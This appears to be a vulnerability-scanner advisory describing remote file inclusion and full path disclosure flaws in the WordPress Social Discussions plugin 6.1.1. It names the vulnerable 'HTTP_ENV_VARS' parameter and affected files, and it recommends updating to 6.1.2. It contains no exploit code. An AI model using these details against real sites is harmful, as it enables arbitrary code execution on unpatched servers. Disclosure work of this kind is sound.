Summary
This host is running WordPress Social Discussions Plugin and is prone to remote file inclusion and full path disclosure vulnerabilities.
Impact
Successful exploitation could allow attackers to attackers to execute arbitrary PHP code and to gain sensitive information like installation path location.
Impact Level: Application
Solution
Update to version 6.1.2 or later,
For updates refer to http://wordpress.org/extend/plugins/social-discussions
Insight
The flaws are due to
- Improper validation of user-supplied input to the 'HTTP_ENV_VARS' parameter in 'social-discussions-networkpub_ajax.php'.
- Error in the social-discussions/social-discussions-networkpub.php, social-discussions/social-discussions.php and
social-discussions/social_discussions_service_names.php, which reveals the full installation path of the script.
Affected
WordPress Social Discussions Plugin version 6.1.1
References
Updated on 2015-03-25